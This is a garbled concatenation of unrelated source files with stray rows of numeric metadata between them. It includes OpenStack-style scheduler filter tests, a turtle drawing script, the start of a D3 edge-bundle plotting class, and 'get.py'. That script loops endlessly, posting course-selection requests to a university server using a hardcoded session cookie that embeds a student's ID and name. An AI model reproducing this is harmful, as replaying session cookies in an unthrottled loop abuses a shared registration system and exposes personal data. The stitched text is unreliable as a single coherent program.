'ephemeral_gb': 0},
'scheduler_hints': {'query': self.json_query}}
capabilities = {'enabled': True}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 1024,
'free_disk_mb': (200 * 1024) - 1,
'capabilities': capabilities})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_json_filter_fails_on_caps_disabled(self):
filt_cls = self.class_map['JsonFilter']()
json_query = jsonutils.dumps(
['and', ['>=', '$free_ram_mb', 1024],
['>=', '$free_disk_mb', 200 * 1024],
'$capabilities.enabled'])
filter_properties = {'instance_type': {'memory_mb': 1024,
'root_gb': 200,
'ephemeral_gb': 0},
'scheduler_hints': {'query': json_query}}
capabilities = {'enabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 1024,
'free_disk_mb': 200 * 1024,
'capabilities': capabilities})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_json_filter_fails_on_service_disabled(self):
filt_cls = self.class_map['JsonFilter']()
json_query = jsonutils.dumps(
['and', ['>=', '$free_ram_mb', 1024],
['>=', '$free_disk_mb', 200 * 1024],
['not', '$service.disabled']])
filter_properties = {'instance_type': {'memory_mb': 1024,
'local_gb': 200},
'scheduler_hints': {'query': json_query}}
capabilities = {'enabled': True}
service = {'disabled': True}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 1024,
'free_disk_mb': 200 * 1024,
'capabilities': capabilities})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_json_filter_happy_day(self):
"""Test json filter more thoroughly"""
filt_cls = self.class_map['JsonFilter']()
raw = ['and',
'$capabilities.enabled',
['=', '$capabilities.opt1', 'match'],
['or',
['and',
['<', '$free_ram_mb', 30],
['<', '$free_disk_mb', 300]],
['and',
['>', '$free_ram_mb', 30],
['>', '$free_disk_mb', 300]]]]
filter_properties = {
'scheduler_hints': {
'query': jsonutils.dumps(raw),
},
}
# Passes
capabilities = {'enabled': True, 'opt1': 'match'}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 10,
'free_disk_mb': 200,
'capabilities': capabilities,
'service': service})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
# Passes
capabilities = {'enabled': True, 'opt1': 'match'}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 40,
'free_disk_mb': 400,
'capabilities': capabilities,
'service': service})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
# Fails due to capabilities being disabled
capabilities = {'enabled': False, 'opt1': 'match'}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'instance_type',
{'free_ram_mb': 40,
'free_disk_mb': 400,
'capabilities': capabilities,
'service': service})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
# Fails due to being exact memory/disk we don't want
capabilities = {'enabled': True, 'opt1': 'match'}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 30,
'free_disk_mb': 300,
'capabilities': capabilities,
'service': service})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
# Fails due to memory lower but disk higher
capabilities = {'enabled': True, 'opt1': 'match'}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 20,
'free_disk_mb': 400,
'capabilities': capabilities,
'service': service})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
# Fails due to capabilities 'opt1' not equal
capabilities = {'enabled': True, 'opt1': 'no-match'}
service = {'enabled': True}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 20,
'free_disk_mb': 400,
'capabilities': capabilities,
'service': service})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_json_filter_basic_operators(self):
filt_cls = self.class_map['JsonFilter']()
host = fakes.FakeHostState('host1', 'compute',
{'capabilities': {'enabled': True}})
# (operator, arguments, expected_result)
ops_to_test = [
['=', [1, 1], True],
['=', [1, 2], False],
['<', [1, 2], True],
['<', [1, 1], False],
['<', [2, 1], False],
['>', [2, 1], True],
['>', [2, 2], False],
['>', [2, 3], False],
['<=', [1, 2], True],
['<=', [1, 1], True],
['<=', [2, 1], False],
['>=', [2, 1], True],
['>=', [2, 2], True],
['>=', [2, 3], False],
['in', [1, 1], True],
['in', [1, 1, 2, 3], True],
['in', [4, 1, 2, 3], False],
['not', [True], False],
['not', [False], True],
['or', [True, False], True],
['or', [False, False], False],
['and', [True, True], True],
['and', [False, False], False],
['and', [True, False], False],
# Nested ((True or False) and (2 > 1)) == Passes
['and', [['or', True, False], ['>', 2, 1]], True]]
for (op, args, expected) in ops_to_test:
raw = [op] + args
filter_properties = {
'scheduler_hints': {
'query': jsonutils.dumps(raw),
},
}
self.assertEqual(expected,
filt_cls.host_passes(host, filter_properties))
# This results in [False, True, False, True] and if any are True
# then it passes...
raw = ['not', True, False, True, False]
filter_properties = {
'scheduler_hints': {
'query': jsonutils.dumps(raw),
},
}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
# This results in [False, False, False] and if any are True
# then it passes...which this doesn't
raw = ['not', True, True, True]
filter_properties = {
'scheduler_hints': {
'query': jsonutils.dumps(raw),
},
}
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_json_filter_unknown_operator_raises(self):
filt_cls = self.class_map['JsonFilter']()
raw = ['!=', 1, 2]
filter_properties = {
'scheduler_hints': {
'query': jsonutils.dumps(raw),
},
}
host = fakes.FakeHostState('host1', 'compute',
{'capabilities': {'enabled': True}})
self.assertRaises(KeyError,
filt_cls.host_passes, host, filter_properties)
def test_json_filter_empty_filters_pass(self):
filt_cls = self.class_map['JsonFilter']()
host = fakes.FakeHostState('host1', 'compute',
{'capabilities': {'enabled': True}})
raw = []
filter_properties = {
'scheduler_hints': {
'query': jsonutils.dumps(raw),
},
}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
raw = {}
filter_properties = {
'scheduler_hints': {
'query': jsonutils.dumps(raw),
},
}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_json_filter_invalid_num_arguments_fails(self):
filt_cls = self.class_map['JsonFilter']()
host = fakes.FakeHostState('host1', 'compute',
{'capabilities': {'enabled': True}})
raw = ['>', ['and', ['or', ['not', ['<', ['>=', ['<=', ['in', ]]]]]]]]
filter_properties = {
'scheduler_hints': {
'query': jsonutils.dumps(raw),
},
}
self.assertFalse(filt_cls.host_passes(host, filter_properties))
raw = ['>', 1]
filter_properties = {
'scheduler_hints': {
'query': jsonutils.dumps(raw),
},
}
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_json_filter_unknown_variable_ignored(self):
filt_cls = self.class_map['JsonFilter']()
host = fakes.FakeHostState('host1', 'compute',
{'capabilities': {'enabled': True}})
raw = ['=', '$........', 1, 1]
filter_properties = {
'scheduler_hints': {
'query': jsonutils.dumps(raw),
},
}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
raw = ['=', '$foo', 2, 2]
filter_properties = {
'scheduler_hints': {
'query': jsonutils.dumps(raw),
},
}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_trusted_filter_default_passes(self):
self._stub_service_is_up(True)
filt_cls = self.class_map['TrustedFilter']()
filter_properties = {'instance_type': {'memory_mb': 1024}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_trusted_filter_trusted_and_trusted_passes(self):
global DATA
DATA = '{"hosts":[{"host_name":"host1","trust_lvl":"trusted"}]}'
self._stub_service_is_up(True)
filt_cls = self.class_map['TrustedFilter']()
extra_specs = {'trusted_host': 'trusted'}
filter_properties = {'instance_type': {'memory_mb': 1024,
'extra_specs': extra_specs}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_trusted_filter_trusted_and_untrusted_fails(self):
global DATA
DATA = '{"hosts":[{"host_name":"host1","trust_lvl":"untrusted"}]}'
self._stub_service_is_up(True)
filt_cls = self.class_map['TrustedFilter']()
extra_specs = {'trusted_host': 'trusted'}
filter_properties = {'instance_type': {'memory_mb': 1024,
'extra_specs': extra_specs}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_trusted_filter_untrusted_and_trusted_fails(self):
global DATA
DATA = '{"hosts":[{"host_name":"host1","trust_lvl":"trusted"}]}'
self._stub_service_is_up(True)
filt_cls = self.class_map['TrustedFilter']()
extra_specs = {'trusted_host': 'untrusted'}
filter_properties = {'instance_type': {'memory_mb': 1024,
'extra_specs': extra_specs}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_trusted_filter_untrusted_and_untrusted_passes(self):
global DATA
DATA = '{"hosts":[{"host_name":"host1","trust_lvl":"untrusted"}]}'
self._stub_service_is_up(True)
filt_cls = self.class_map['TrustedFilter']()
extra_specs = {'trusted_host': 'untrusted'}
filter_properties = {'instance_type': {'memory_mb': 1024,
'extra_specs': extra_specs}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_core_filter_passes(self):
filt_cls = self.class_map['CoreFilter']()
filter_properties = {'instance_type': {'vcpus': 1}}
self.flags(cpu_allocation_ratio=2)
host = fakes.FakeHostState('host1', 'compute',
{'vcpus_total': 4, 'vcpus_used': 7})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_core_filter_fails_safe(self):
filt_cls = self.class_map['CoreFilter']()
filter_properties = {'instance_type': {'vcpus': 1}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_core_filter_fails(self):
filt_cls = self.class_map['CoreFilter']()
filter_properties = {'instance_type': {'vcpus': 1}}
self.flags(cpu_allocation_ratio=2)
host = fakes.FakeHostState('host1', 'compute',
{'vcpus_total': 4, 'vcpus_used': 8})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
@staticmethod
def _make_zone_request(zone, is_admin=False):
ctxt = context.RequestContext('fake', 'fake', is_admin=is_admin)
return {
'context': ctxt,
'request_spec': {
'instance_properties': {
'availability_zone': zone
}
}
}
def test_availability_zone_filter_same(self):
filt_cls = self.class_map['AvailabilityZoneFilter']()
service = {'availability_zone': 'nova'}
request = self._make_zone_request('nova')
host = fakes.FakeHostState('host1', 'compute', {'service': service})
self.assertTrue(filt_cls.host_passes(host, request))
def test_availability_zone_filter_different(self):
filt_cls = self.class_map['AvailabilityZoneFilter']()
service = {'availability_zone': 'nova'}
request = self._make_zone_request('bad')
host = fakes.FakeHostState('host1', 'compute', {'service': service})
self.assertFalse(filt_cls.host_passes(host, request))
def test_arch_filter_same(self):
permitted_instances = ['x86_64']
filt_cls = self.class_map['ArchFilter']()
filter_properties = {
'request_spec': {
'instance_properties': {'architecture': 'x86_64'}
}
}
capabilities = {'enabled': True,
'cpu_info': {
'permitted_instance_types': permitted_instances
}
}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'capabilities': capabilities, 'service': service})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_arch_filter_different(self):
permitted_instances = ['arm']
filt_cls = self.class_map['ArchFilter']()
filter_properties = {
'request_spec': {
'instance_properties': {'architecture': 'x86_64'}
}
}
capabilities = {'enabled': True,
'cpu_info': {
'permitted_instance_types': permitted_instances
}
}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'capabilities': capabilities, 'service': service})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_arch_filter_without_permitted_instances(self):
permitted_instances = []
filt_cls = self.class_map['ArchFilter']()
filter_properties = {
'request_spec': {
'instance_properties': {'architecture': 'x86_64'}
}
}
capabilities = {'enabled': True,
'cpu_info': {
'permitted_instance_types': permitted_instances
}
}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'capabilities': capabilities, 'service': service})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_retry_filter_disabled(self):
"""Test case where retry/re-scheduling is disabled"""
filt_cls = self.class_map['RetryFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
filter_properties = {}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_retry_filter_pass(self):
"""Host not previously tried"""
filt_cls = self.class_map['RetryFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
retry = dict(num_attempts=1, hosts=['host2', 'host3'])
filter_properties = dict(retry=retry)
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_retry_filter_fail(self):
"""Host was already tried"""
filt_cls = self.class_map['RetryFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
retry = dict(num_attempts=1, hosts=['host3', 'host1'])
filter_properties = dict(retry=retry)
self.assertFalse(filt_cls.host_passes(host, filter_properties))
| 43.069414
| 79
| 0.572627
| 3,936
| 39,710
| 5.495681
| 0.089431
| 0.039804
| 0.03458
| 0.053442
| 0.8363
| 0.823217
| 0.81337
| 0.795849
| 0.779853
| 0.747446
| 0
| 0.018241
| 0.30005
| 39,710
| 921
| 80
| 43.116178
| 0.759993
| 0.046235
| 0
| 0.656043
| 0
| 0
| 0.163373
| 0.020637
| 0
| 0
| 0
| 0
| 0.096946
| 1
| 0.084993
| false
| 0.118194
| 0.015936
| 0.003984
| 0.111554
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
c4c8d79be5e07ecfdbbae83201e30069b79d7435
| 4,106
|
py
|
Python
|
get.py
|
chen86860/WYUStudentSocreCalculator
|
0437b6ebd7caccf6820a97e08b5d4818383cf7e2
|
[
"MIT"
] | null | null | null |
get.py
|
chen86860/WYUStudentSocreCalculator
|
0437b6ebd7caccf6820a97e08b5d4818383cf7e2
|
[
"MIT"
] | null | null | null |
get.py
|
chen86860/WYUStudentSocreCalculator
|
0437b6ebd7caccf6820a97e08b5d4818383cf7e2
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
__author__ = '星星'
import urllib
import urllib2
import cookielib
import string
TskUrl = "http://202.192.240.54/tbx/tsk/savesel.aspx"
User_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36"
Refere = "http://202.192.240.54/tbx/tsk/confirm.aspx"
jingguan=[
"0103950_0_%e5%88%9b%e4%b8%9a%e7%ae%a1%e7%90%86%e4%b8%8e%e5%95%86%e4%b8%9a%e6%a8%a1%e5%bc%8f_0.5",
"0103980_0_%e5%a4%a7%e5%ad%a6%e7%94%9f%e8%87%aa%e6%88%91%e7%ae%a1%e7%90%86_0.5",
"0100340_0_%e5%bd%93%e4%bb%a3%e5%9b%bd%e9%99%85%e9%87%91%e8%9e%8d%e5%af%bc%e8%ae%ba_0.5",
"0100350_0_%e5%bd%93%e4%bb%a3%e5%9b%bd%e9%99%85%e8%b4%b8%e6%98%93%e5%af%bc%e8%ae%ba_0.5",
"0100350_1_%e5%bd%93%e4%bb%a3%e5%9b%bd%e9%99%85%e8%b4%b8%e6%98%93%e5%af%bc%e8%ae%ba_0.5",
"0100390_0_%e7%ae%a1%e7%90%86%e7%90%86%e8%ae%ba%e5%af%bc%e8%ae%ba_0.25",
"0100390_1_%e7%ae%a1%e7%90%86%e7%90%86%e8%ae%ba%e5%af%bc%e8%ae%ba_0.25",
"0100430_0_%e4%bc%9a%e8%ae%a1%e5%ad%a6%e5%af%bc%e8%ae%ba_0.5",
"0100430_1_%e4%bc%9a%e8%ae%a1%e5%ad%a6%e5%af%bc%e8%ae%ba_0.5",
"0100330_0_%e7%bb%8f%e6%b5%8e%e5%ad%a6%e5%af%bc%e8%ae%ba_0.25",
"0100470_0_%e4%ba%ba%e5%8a%9b%e8%b5%84%e6%ba%90%e7%ae%a1%e7%90%86%e5%af%bc%e8%ae%ba_0.25",
"0100440_0_%e7%a8%8e%e6%94%b6%e5%ad%a6%e5%af%bc%e8%ae%ba_0.25",
"0100440_1_%e7%a8%8e%e6%94%b6%e5%ad%a6%e5%af%bc%e8%ae%ba_0.25",
"0100460_0_%e7%89%a9%e6%b5%81%e7%ae%a1%e7%90%86%e5%af%bc%e8%ae%ba_0.25"
]
# Cookie="""ASP.NET_SessionId=jdmcmcirnxpui355epnt3kry; 3113003893=STINFO=3113003893%7c%e9%99%88%e9%be%99%7c%e7%94%b7%7c2013%7c%e7%94%b5%e5%ad%90%e4%bf%a1%e6%81%af%e5%b7%a5%e7%a8%8b(%e4%bf%a1%e6%81%af%e5%ae%89%e5%85%a8)%7c130807%7c130807%7c8%7c28%7c%7c06&ULIMIT=28&CET=0400303$0400320$0400342$0400351$0400430$0400470$0400440$0401650$0401690$0401720$0401730$0401740$0401750$0401630$0401640&DEZY=&ZXXK=; 3113003893_XZKC=XZKC=0300410_0_%e6%95%99%e5%b8%88%e5%8f%a3%e8%af%ad_0.5"""
# Cookie2="""ASP.NET_SessionId=jdmcmcirnxpui355epnt3kry;3113003893=STINFO=3113003893%7c%e9%99%88%e9%be%99%7c%e7%94%b7%7c2013%7c%e7%94%b5%e5%ad%90%e4%bf%a1%e6%81%af%e5%b7%a5%e7%a8%8b(%e4%bf%a1%e6%81%af%e5%ae%89%e5%85%a8)%7c130807%7c130807%7c8%7c28%7c%7c06&ULIMIT=28&CET=0400303$0400320$0400342$0400351$0400430$0400470$0400440$0401650$0401690$0401720$0401730$0401740$0401750$0401630$0401640&DEZY=&ZXXK=; 3113003893_XZKC=XZKC=0300410_0_%e6%95%99%e5%b8%88%e5%8f%a3%e8%af%ad_0.5"""
# Cookie3="""ASP.NET_SessionId=jdmcmcirnxpui355epnt3kry; 3113003893=STINFO=3113003893%7c%e9%99%88%e9%be%99%7c%e7%94%b7%7c2013%7c%e7%94%b5%e5%ad%90%e4%bf%a1%e6%81%af%e5%b7%a5%e7%a8%8b(%e4%bf%a1%e6%81%af%e5%ae%89%e5%85%a8)%7c130807%7c130807%7c8%7c28%7c%7c06&ULIMIT=28&CET=0400303$0400320$0400342$0400351$0400430$0400470$0400440$0401650$0401690$0401720$0401730$0401740$0401750$0401630$0401640&DEZY=&ZXXK=; 3113003893_XZKC=XZKC=0200230_2_%e7%94%9f%e5%91%bd%e6%95%99%e8%82%b2_0.5"""
while True:
for cast in jingguan:
Cookie = """ASP.NET_SessionId=jdmcmcirnxpui355epnt3kry; 3113003893=STINFO=3113003893%7c%e9%99%88%e9%be%99%7c%e7%94%b7%7c2013%7c%e7%94%b5%e5%ad%90%e4%bf%a1%e6%81%af%e5%b7%a5%e7%a8%8b(%e4%bf%a1%e6%81%af%e5%ae%89%e5%85%a8)%7c130807%7c130807%7c8%7c28%7c%7c06&ULIMIT=28&CET=0400303$0400320$0400342$0400351$0400430$0400470$0400440$0401650$0401690$0401720$0401730$0401740$0401750$0401630$0401640&DEZY=&ZXXK=; 3113003893_XZKC=XZKC=""" + cast
headers = {
"User-agent":User_agent,
"Referer":Refere,
"Cookie":Cookie
}
values ={
# "__VIEWSTATE":"/wEPDwUIMjczNjAxNzUPZBYCAgMPZBYCAgMPZBYCAgEPZBYGZg8PFgIeBFRleHQFCTAzMDA0MjBfM2RkAgEPDxYCHwAFCeWPo+aJjeWtpmRkAgIPDxYCHwAFAzAuNWRkZKTF4DfxRaba0KNWAIXZsbnijlZL",
# "__VIEWSTATEGENERATOR":"1D48D657",
# "__EVENTVALIDATION":"/wEWAgKq1/3gBgKM54rGBqcjNmloBijE3gMkwBCguYcjeibv",
"Button1":"确定选课"
}
data = urllib.urlencode(values)
requset = urllib2.Request(url=TskUrl,data=data,headers=headers)
response = urllib2.urlopen(requset)
print response.read()
| 83.795918
| 477
| 0.709937
| 803
| 4,106
| 3.541719
| 0.219178
| 0.022504
| 0.029536
| 0.033755
| 0.668425
| 0.668425
| 0.659986
| 0.645218
| 0.645218
| 0.63045
| 0
| 0.366844
| 0.081831
| 4,106
| 49
| 478
| 83.795918
| 0.387533
| 0.420848
| 0
| 0
| 0
| 0.410256
| 0.703501
| 0.603543
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.102564
| null | null | 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4cc7c0a26bdb08f518075da003699866129499a
| 173
|
py
|
Python
|
Lesson_1/square.py
|
LPetrova/Python
|
0be5939ecfc5f0fecce33fee314bfe534aed8efd
|
[
"MIT"
] | null | null | null |
Lesson_1/square.py
|
LPetrova/Python
|
0be5939ecfc5f0fecce33fee314bfe534aed8efd
|
[
"MIT"
] | null | null | null |
Lesson_1/square.py
|
LPetrova/Python
|
0be5939ecfc5f0fecce33fee314bfe534aed8efd
|
[
"MIT"
] | null | null | null |
import turtle
size = 70
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
turtle.left(90)
| 14.416667
| 20
| 0.774566
| 28
| 173
| 4.785714
| 0.25
| 0.38806
| 0.507463
| 0.686567
| 0.865672
| 0.865672
| 0.865672
| 0.865672
| 0.865672
| 0.865672
| 0
| 0.062893
| 0.080925
| 173
| 12
| 21
| 14.416667
| 0.779874
| 0
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
c4d44c8e2022a088efaf358e9577cedf3925722b
| 177,920
|
py
|
Python
|
multivis/edgeBundle.py
|
brettChapman/cimcb_vis
|
b373ed426b24ece1dcc20febd7c8023921b024d6
|
[
"MIT"
] | null | null | null |
multivis/edgeBundle.py
|
brettChapman/cimcb_vis
|
b373ed426b24ece1dcc20febd7c8023921b024d6
|
[
"MIT"
] | null | null | null |
multivis/edgeBundle.py
|
brettChapman/cimcb_vis
|
b373ed426b24ece1dcc20febd7c8023921b024d6
|
[
"MIT"
] | null | null | null |
import os
import sys
from string import Template
import numpy as np
import pandas as pd
import copy
import webbrowser as wb
import matplotlib
import matplotlib.pyplot as plt
from .utils import *
class edgeBundle:
usage = """Produces an interactive hierarchical edge bundle in D3.js, from nodes and edges.
Parameters
----------
nodes : Pandas dataframe containing nodes generated from Edge.
edges : Pandas dataframe containing edges generated from Edge.
Methods
-------
set_params : Set parameters -
html_file: Name to save the HTML file as (default: 'hEdgeBundle.html')
innerRadiusOffset: Sets the inner radius based on the offset value from the canvas width/diameter (default: 120)
blockSeparation: Value to set the distance between different segmented blocks (default: 1)
linkFadeOpacity: The link fade opacity when hovering over/clicking nodes (default: 0.05)
mouseOver: Setting to 'True' swaps from clicking to hovering over nodes to select them (default: True)
fontSize: The font size in pixels set for each node (default: 10)
backgroundColor: Set the background colour of the plot (default: 'white')
foregroundColor: Set the foreground colour of the plot (default: 'black')
node_data: Peak Table column names to include in the mouse over information (default: 'Name' and 'Label')
nodeColorScale: The scale to use for colouring the nodes ("linear", "reverse_linear", "log", "reverse_log", "square", "reverse_square", "area", "reverse_area", "volume", "reverse_volume", "ordinal", "reverse_ordinal") (default: 'linear')
node_color_column: The Peak Table column to use for node colours (default: None sets to black)
node_cmap: Set the CMAP colour palette to use for colouring the nodes (default: 'brg')
edgeColorScale: The scale to use for colouring the edges, if edge_color_value is 'pvalue' ("linear", "reverse_linear", "log", "reverse_log", "square", "reverse_square", "area", "reverse_area", "volume", "reverse_volume", "ordinal", "reverse_ordinal") (default: 'linear')
edge_color_value: Set the values to colour the edges by. Either 'sign', 'score or 'pvalue' (default: 'score')
edge_cmap: Set the CMAP colour palette to use for colouring the edges (default: 'brg')
addArcs: Setting to 'True' adds arcs around the edge bundle for each block (default: False)
arcRadiusOffset: Sets the arc radius offset from the inner radius (default: 20)
extendArcAngle: Sets the angle value to add to each end of the arcs (default: 2)
arc_cmap: Set the CMAP colour palette to use for colouring the arcs (default: 'Set1')
help : Print this help text
build : Generates the JavaScript embedded HTML code and writes to a HTML file and opens it in a browser.
buildDashboard : Generates the JavaScript embedded HTML code in a dashboard format, writes to a HTML file and opens it in a browser.
"""
def __init__(self, nodes, edges):
self.__nodes = self.__checkNodes(copy.deepcopy(nodes));
self.__edges = self.__checkEdges(copy.deepcopy(edges));
self.set_params()
def help(self):
print(edgeBundle.usage)
def set_params(self, html_file='hEdgeBundle.html', innerRadiusOffset=120, blockSeparation=1, linkFadeOpacity=0.05, mouseOver=True, fontSize=10, backgroundColor='white', foregroundColor='black', node_data=['Name', 'Label'], nodeColorScale='linear', node_color_column='none', node_cmap='brg', edgeColorScale='linear', edge_color_value='score', edge_cmap="brg", addArcs=False, arcRadiusOffset=20, extendArcAngle=2, arc_cmap="Set1"):
html_file, innerRadiusOffset, blockSeparation, linkFadeOpacity, mouseOver, fontSize, backgroundColor, foregroundColor, node_data, nodeColorScale, node_color_column, node_cmap, edgeColorScale, edge_color_value, edge_cmap, addArcs, arcRadiusOffset, extendArcWidth, arc_cmap = self.__paramCheck(html_file, innerRadiusOffset, blockSeparation, linkFadeOpacity, mouseOver, fontSize, backgroundColor, foregroundColor, node_data, nodeColorScale, node_color_column, node_cmap, edgeColorScale, edge_color_value, edge_cmap, addArcs, arcRadiusOffset, extendArcAngle, arc_cmap)
self.__html_file = html_file;
self.__innerRadiusOffset = innerRadiusOffset;
self.__blockSeparation = blockSeparation;
self.__linkFadeOpacity = linkFadeOpacity;
self.__mouseOver = mouseOver;
self.__fontSize = fontSize;
self.__backgroundColor = backgroundColor;
self.__foregroundColor = foregroundColor;
self.__node_data = node_data;
self.__nodeColorScale = nodeColorScale;
self.__node_color_column = node_color_column;
self.__node_cmap = node_cmap;
self.__edgeColorScale = edgeColorScale;
self.__edge_color_value = edge_color_value;
self.__edge_cmap = edge_cmap;
self.__addArcs = addArcs;
self.__arcRadiusOffset = arcRadiusOffset;
self.__extendArcAngle = extendArcAngle;
self.__arc_cmap = arc_cmap;
def __process_params(self):
nodes = self.__nodes
edges = self.__edges
mouseOver = self.__mouseOver
addArcs = self.__addArcs
pvalue_matrix_flag = self.__pvalue_matrix_flag
nodes, edges = self.__node_color(nodes, edges)
nodes, edges = self.__block_color(nodes, edges)
edges = self.__edge_color(edges)
if mouseOver:
mouse = "true";
else:
mouse = "false";
if addArcs:
arcs = "true";
else:
arcs = "false";
if pvalue_matrix_flag:
pmFlag = "true"
dispFilterType = "inline-block"
adj_score_top = "30px"
dash_adj_score_top = "42px"
else:
pmFlag = "false"
dispFilterType = "none"
adj_score_top = "0px"
dash_adj_score_top = "10px"
bundleJson = self.__df_to_Json(nodes, edges);
return bundleJson, mouse, arcs, pmFlag, dispFilterType, adj_score_top, dash_adj_score_top
def build(self):
backgroundColor = self.__backgroundColor
foregroundColor = self.__foregroundColor
innerRadiusOffset = self.__innerRadiusOffset
arcRadiusOffset = self.__arcRadiusOffset
extendArcAngle = self.__extendArcAngle
blockSeparation = self.__blockSeparation
linkFadeOpacity = self.__linkFadeOpacity
fontSize = self.__fontSize
html_file = self.__html_file
bundleJson, mouse, arcs, pmFlag, dispFilterType, adj_score_top, dash_adj_score_top = self.__process_params()
css_text_template_bundle = Template(self.__getCSS());
js_text_template_bundle = Template(self.__getJS());
html_template_bundle = Template(self.__getHTML());
js_text = js_text_template_bundle.substitute({'flareData': bundleJson
, 'innerRadiusOffset': innerRadiusOffset
, 'blockSeparation': blockSeparation
, 'linkFadeOpacity': linkFadeOpacity
, 'fontSize': fontSize
, 'mouseOver': mouse
, 'addArcs': arcs
, 'arcRadiusOffset': arcRadiusOffset
, 'extendArcAngle': extendArcAngle
, 'pmFlag': pmFlag
, 'backgroundColor': backgroundColor})
css_text = css_text_template_bundle.substitute({'backgroundColor': backgroundColor
, 'foregroundColor': foregroundColor
, 'display_filter_type': dispFilterType
, 'adj_score_top': adj_score_top})
html = html_template_bundle.substitute({'css_text': css_text, 'js_text': js_text})
with open(html_file, 'w') as f:
f.write(html)
f.close()
print("HTML writen to {}".format(html_file))
wb.open('file://' + os.path.realpath(html_file))
def buildDashboard(self):
backgroundColor = self.__backgroundColor
foregroundColor = self.__foregroundColor
innerRadiusOffset = self.__innerRadiusOffset
arcRadiusOffset = self.__arcRadiusOffset
extendArcAngle = self.__extendArcAngle
blockSeparation = self.__blockSeparation
linkFadeOpacity = self.__linkFadeOpacity
fontSize = self.__fontSize
html_file = self.__html_file
node_data = self.__node_data
bundleJson, mouse, arcs, pmFlag, dispFilterType, adj_score_top, dash_adj_score_top = self.__process_params()
css_text_template_bundle = Template(self.__getCSSdashboard());
js_text_template_bundle = Template(self.__getJSdashboard());
html_template_bundle = Template(self.__getHTMLdashboard());
js_text = js_text_template_bundle.substitute({'flareData': bundleJson
, 'innerRadiusOffset': innerRadiusOffset
, 'blockSeparation': blockSeparation
, 'linkFadeOpacity': linkFadeOpacity
, 'fontSize': fontSize
, 'mouseOver': mouse
, 'addArcs': arcs
, 'arcRadiusOffset': arcRadiusOffset
, 'extendArcAngle': extendArcAngle
, 'pmFlag': pmFlag
, 'node_data': {'data': node_data}
, 'backgroundColor': backgroundColor})
